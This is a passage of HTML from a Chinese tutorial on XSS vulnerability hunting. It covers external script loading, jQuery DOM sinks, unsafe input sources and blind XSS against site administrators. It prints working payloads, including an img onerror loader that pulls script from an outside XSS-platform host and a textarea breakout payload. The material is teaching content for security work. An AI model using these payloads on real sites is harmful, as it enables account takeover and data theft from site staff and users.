margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; font-size: 14px; letter-spacing: 0.5px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H455232.png" title="XSS漏洞挖掘之跨站脚本攻击(图6)" alt="XSS漏洞挖掘之跨站脚本攻击(图6)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">5.1.2.5 调用外部脚本</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">1. 静态创建</strong></p></section><p></p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><script src="JS地址"></script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">2. 动态创建</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><script><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>var s=document.createElement("script");<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>s.src="JS地址";<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>(document.body||document.documentElement).appendChild(s);<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></script></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">3. 图片方式调用外部JS</strong></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 1.6; letter-spacing: 0px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><img style=display:none src=1 onerror=&#39;var s=document.createElement("script");s.src="http://xsst.sinaapp.com/m.js";(document.body||document.documentElement).appendChild(s);&#39; /></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">4.借用Jquery</strong></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">$</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">我们经常使用向 $ 内传入一个字符串的方式来选择或生成 DOM 元素,但如果这个字符串是来自用户输入的话,那么这种方式就是有风险的。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">先看一个 DEMO:</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; color: rgb(95, 156, 239);">http://jsbin.com/duwuzonife/1/edit?html,js,output</span></p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">$("<img src=&#39;&#39; onerror=&#39;alert();&#39;>");</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px; color: rgba(0, 0, 0, 0.96);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">当用户输入的字符串是像这样的时,虽然这个 元素不会马上被插入到网页的 DOM 中,但这个 DOM 元素已经被创建了,并且暂存在内存里。而对于 元素,只要设置了它的 src 属性,浏览器就会马上请求 src 属性所指向的资源。我们也可以利用这个特性做图片的预加载。在上面的示例代码中,创建元素的同时,也设置了它的属性,包括 src 属性和 onerror 事件监听器,所以浏览器会马上请求图片资源,显然请求不到,随机触发 onerror 的回调函数,也就执行了 JavaScript 代码。</span></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">推荐阅读 $ 的官方文档:<span style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; color: rgb(95, 156, 239);">http://api.jquery.com/jQuery/</span></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">类似的其他方法</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">after()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.append()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.appendTo()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.before()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.html()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.insertAfter()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.insertBefore()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.prepend()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.prependTo()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.replaceAll()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.replaceWith()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.unwrap()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.wrap()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.wrapAll()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.wrapInner()<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>.prepend()</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px; color: rgba(0, 0, 0, 0.96);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">以上这些方法不仅创建 DOM 元素,并且会马上插入到页面的 DOM 树中。如果使用 `` 标签插入了内联 JS 会立即执行。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">不安全的输入来源</p></section><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">document.URL *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.pathname *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.href *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.search *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.location.hash<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.referrer *<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>window.name<br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document.cookie</p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px; color: rgba(0, 0, 0, 0.96);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/>document 的大多数属性都可以通过全局的 window 对象访问到。加 * 的属性返回的时编码 (urlencode) 后的字符串,需要解码才可能造成威胁。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p></section><p></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H546109.png" title="XSS漏洞挖掘之跨站脚本攻击(图7)" alt="XSS漏洞挖掘之跨站脚本攻击(图7)"/></p><section powered-by="xiumi.us" style="margin: 30px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; vertical-align: top; border-width: 1px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71); background-color: rgb(238, 233, 241);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: -3px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: -10px 0px -10px 20px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 6px 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-image: linear-gradient(90deg, rgb(231, 59, 112) 0%, rgba(231, 59, 112, 0.2) 100%);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 1; letter-spacing: 0px; font-size: 32px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">05</strong></p></section></section></section></section><section style="margin: 0px; padding: 10px 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 1 1 auto; border-width: 0px;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 2; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">盲打</strong></p></section></section></section></section></section></section><p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px; line-height: 2; letter-spacing: 1px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">“明打”: 知道输出点情况,可以慢慢调整攻击代码。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">“盲打”: 不清楚输出点情况,只能猜想。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">盲打只是一种惯称的说法,就是不知道后台不知道有没有xss存在的情况下,不顾一切的输入xss代码在留言啊,feedback啊之类的地方,尽可能多的尝试xss的语句与语句的存在方式,就叫盲打。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">”xss盲打“是指在攻击者对数据提交后展现的后台未知的情况下,网站采用了攻击者插入了带真实攻击功能的xss攻击代码(通常是使用script标签引入远程的js)的数据。当未知后台在展现时没有对这些提交的数据进行过滤,那么后台管理人员在操作时就会触发xss来实现攻击者预定好的“真实攻击功能”。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;">通俗讲就是见到输入框就输入提前准备的xss代码,通常是使用script标签引入远程的js代码,当有后台人员审核提交数据时候,点击了提交的数据,触发获取到有价值信息。</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; white-space: normal; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"/></p></section></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H611941.png" title="XSS漏洞挖掘之跨站脚本攻击(图8)" alt="XSS漏洞挖掘之跨站脚本攻击(图8)"/></p><p><img style="max-width:100%!important;height:auto!important;" src="/uploads/ueditor/20200226/1-2002261H623630.png" title="XSS漏洞挖掘之跨站脚本攻击(图9)" alt="XSS漏洞挖掘之跨站脚本攻击(图9)"/></p><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">常见的输出场景</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">1. [输出点]</p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">2.<input type="text" value=" [输出点] "></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">3.<textarea> [输出点] </textarea></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box !important; overflow-wrap: break-word !important;"/></p><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">考虑多种情况,所以构造出XSS语句:</p></section><p><section powered-by="xiumi.us" style="margin: 10px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; border-width: 2px; border-style: dashed; border-color: rgb(192, 200, 209); background-color: rgb(239, 239, 239);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; font-size: 14px;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;">“&#39;></textarea><img src=1 onerror=alert(1)></p></section></section></section><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); font-size: 14px; line-height: 2; letter-spacing: 1px; overflow-wrap: break-word !important;"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><br style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"/></p></section><section powered-by="xiumi.us" style="margin: 30px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; color: rgb(51, 51, 51); font-family: -apple-system-font, BlinkMacSystemFont, "Helvetica Neue", "PingFang SC", "Hiragino Sans GB", "Microsoft YaHei UI", "Microsoft YaHei", Arial, sans-serif; letter-spacing: 0.544px; text-align: justify; white-space: normal; background-color: rgb(255, 255, 255); overflow-wrap: break-word !important;"><section style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; width: 677px; vertical-align: top; border-width: 1px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71); background-color: rgb(238, 233, 241);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;"><section style="margin: -3px 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; align-items: center; display: flex;"><section style="margin: -10px 0px -10px 20px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 0 0 auto; border-width: 0px; border-radius: 0px; border-style: none; border-color: rgb(76, 68, 71);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; text-align: center; transform: translate3d(-10px, 0px, 0px);"><section style="margin: 0px; padding: 6px 10px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; min-width: 10%; vertical-align: top; transform: matrix(1, 0, -0.2, 1, 0, 0); border-style: solid; border-width: 0px; border-radius: 0px; border-color: rgb(76, 68, 71); background-image: linear-gradient(90deg, rgb(231, 59, 112) 0%, rgba(231, 59, 112, 0.2) 100%);"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 1; letter-spacing: 0px; font-size: 32px; color: rgb(255, 255, 255);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important;">06</strong></p></section></section></section></section><section style="margin: 0px; padding: 10px 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; display: inline-block; vertical-align: bottom; width: auto; flex: 1 1 auto; border-width: 0px;"><section powered-by="xiumi.us" style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; overflow-wrap: break-word !important; line-height: 2; letter-spacing: 1px; color: rgb(76, 68, 71);"><p style="margin-top: 0px; margin-bottom: 0px; padding: 0px; max-width: 100%; box-sizing: border-box; clear: both; min-height: 1em; overflow-wrap: break-word !important;"><strong style="margin: 0px; padding: 0px; max-width: 100%; box-sizing: 